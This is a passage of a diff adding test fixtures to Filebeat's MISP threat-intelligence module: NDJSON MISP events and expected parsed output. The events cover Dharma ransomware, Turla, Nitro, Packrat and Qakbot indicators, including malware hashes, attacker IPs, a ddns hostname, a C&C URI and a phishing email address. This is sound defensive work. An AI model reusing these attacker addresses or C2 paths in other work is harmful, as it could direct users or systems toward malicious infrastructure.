ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} +{"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"External analysis","comment":"Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"4","first_seen":null,"id":"342","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1490878550","to_ids":false,"type":"link","uuid":"58dd0056-6e74-43d5-b58b-494802de0b81","value":"https://www.virustotal.com/file/7fa4482bfbca550ce296d8e791b1091d60d733ea8042167fd0eb853530584452/analysis/1486030116/"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["Alexandre Dulaunoy","Florian Roth","Timo Steffens","Christophe Vandeplas","Dennis Rand","raw-data"],"collection_uuid":"0d821b68-9d82-4c6d-86a6-1071a9e0f79f","description":"Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features...for now!","galaxy_id":"36","id":"5828","local":false,"meta":{"refs":["https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf","https://objective-see.com/blog/blog_0x25.html#Snake"],"synonyms":["Snake","Uroburos","Urouros"],"type":["Backdoor","Rootkit"]},"source":"MISP Project","tag_id":"22","tag_name":"misp-galaxy:tool=\"Turla\"","type":"tool","uuid":"22332d52-c0c2-443c-9ffb-f08c0d23722c","value":"Turla","version":"138"}],"description":"Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.","icon":"optin-monster","id":"36","name":"Tool","namespace":"misp","type":"tool","uuid":"9b8037f7-bc8f-4de1-a797-37266619bc0b","version":"3"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2015-01-20","distribution":"3","id":"369","info":"OSINT Analysis of Project Cobra Another extensible framework used by the Uroburos’ actors from Gdata","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"1","timestamp":"1498163317","uuid":"54bf5a6f-ac50-4f71-9cd3-7080950d210b"}},{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2014-11-20","distribution":"3","id":"621","info":"Turla digging using TotalHash","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"2","timestamp":"1498163604","uuid":"546daad5-425c-4ac4-82c7-e07f950d210b"}}],"ShadowAttribute":[],"Tag":[{"colour":"#065100","exportable":true,"hide_tag":false,"id":"22","local":0,"name":"misp-galaxy:tool=\"Turla\"","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"100","date":"2017-03-30","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"4","info":"OSINT - Carbon Paper: Peering into Turla’s second stage backdoor","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226330","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1493403824","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1077","type":"sha256","category":"External analysis","to_ids":true,"uuid":"54324042-49fc-4628-a95e-44da950d210b","event_id":"2","distribution":"5","timestamp":"1412579394","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0a1103bc90725d4665b932f88e81d39eafa5823b0de3ab146e2d4548b7da79a0","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1084","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"54324081-3308-4f1f-8674-4953950d210b","event_id":"2","distribution":"5","timestamp":"1412579457","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"223.25.233.248","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1086","type":"hostname","category":"Network activity","to_ids":true,"uuid":"543240dc-f068-437a-baa9-48f2950d210b","event_id":"2","distribution":"5","timestamp":"1412579548","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"xenserver.ddns.net","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1089","type":"text","category":"External analysis","to_ids":false,"uuid":"543240f9-64e8-41f2-958f-4e21950d210b","event_id":"2","distribution":"5","timestamp":"1412579577","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"Nitro","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1090","type":"sha1","category":"External analysis","to_ids":true,"uuid":"56c625a7-f31c-460c-9ea1-c652950d210f","event_id":"2","distribution":"5","timestamp":"1455826343","comment":"Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0ea76f1586c008932d90c991dfdd5042f3aac8ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"12394","type":"domain","category":"Network activity","to_ids":false,"uuid":"572b4ab3-1af0-4d91-9cd5-07a1c0a8ab16","event_id":"22","distribution":"5","timestamp":"1462454963","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"whatsapp.com","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17299","type":"url","category":"Network activity","to_ids":false,"uuid":"5a53976c-e7c8-480d-a68a-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515427692","comment":"Fake adobe URL","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"http://get.adobe.com/stats/AbfFcBebD/?q=","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17330","type":"uri","category":"Network activity","to_ids":false,"uuid":"5a539ce1-3de0-4e34-8fc4-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515429089","comment":"Win32 backdoor C&C URI","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"/scripts/m/query.php?id=","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17322","type":"filename|sha1","category":"Artifacts dropped","to_ids":false,"uuid":"5a539ce1-e6a0-426a-942c-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515429089","comment":"JavaScript backdoor","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12268","type":"email-src","category":"Payload delivery","to_ids":true,"uuid":"56ccdcb6-4d6c-4e48-b955-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266422","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"claudiobonadio88@gmail.com","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12298","type":"regkey","category":"Artifacts dropped","to_ids":true,"uuid":"56ccdcd6-f4b8-4383-9624-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266454","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"HKLM\\SOFTWARE\\Microsoft\\Active","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"10","orgc_id":"4","org_id":"1","date":"2020-12-09","threat_level_id":"3","info":"Recent Qakbot (Qbot) activity","published":true,"uuid":"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16","attribute_count":"15","analysis":"2","timestamp":"1607868196","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637888","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"10686","type":"ip-dst|port","category":"Network activity","to_ids":true,"uuid":"5fd0c620-a844-4ace-9710-a37bc0a8ab16","event_id":"10","distribution":"5","timestamp":"1607517728","comment":"On port 2222","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"62.38.114.12|2222","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"6","name":"misp-galaxy:banker=\"Qakbot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0}]}} \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json new file mode 100644 index 000000000000..660df12cb768 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json @@ -0,0 +1,743 @@ +[ + { + "@timestamp": "2017-08-28T14:24:32.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:ransomware=Dharma Ransomware", + "type:OSINT", + "tlp:white", + "malware_classification:malware-category=Ransomware", + "osint:source-type=blog - post" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Payload delivery", + "threatintel.misp.attribute.comment": "- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "5", + "threatintel.misp.attribute.id": "351", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1503930272", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "md5", + "threatintel.misp.attribute_count": "7", + "threatintel.misp.date": "2017-08-25", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "5", + "threatintel.misp.info": "OSINT - New Arena Crysis Ransomware Variant Released", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CIRCL", + "threatintel.misp.orgc.uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1603226331", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "59a3d08d-5dc8-4153-bc7c-456d950d210f" + }, + { + "@timestamp": "2018-11-19T18:34:42.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 8248, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:ransomware=Dharma Ransomware", + "type:OSINT", + "tlp:white", + "malware_classification:malware-category=Ransomware", + "osint:source-type=blog - post" + ], + 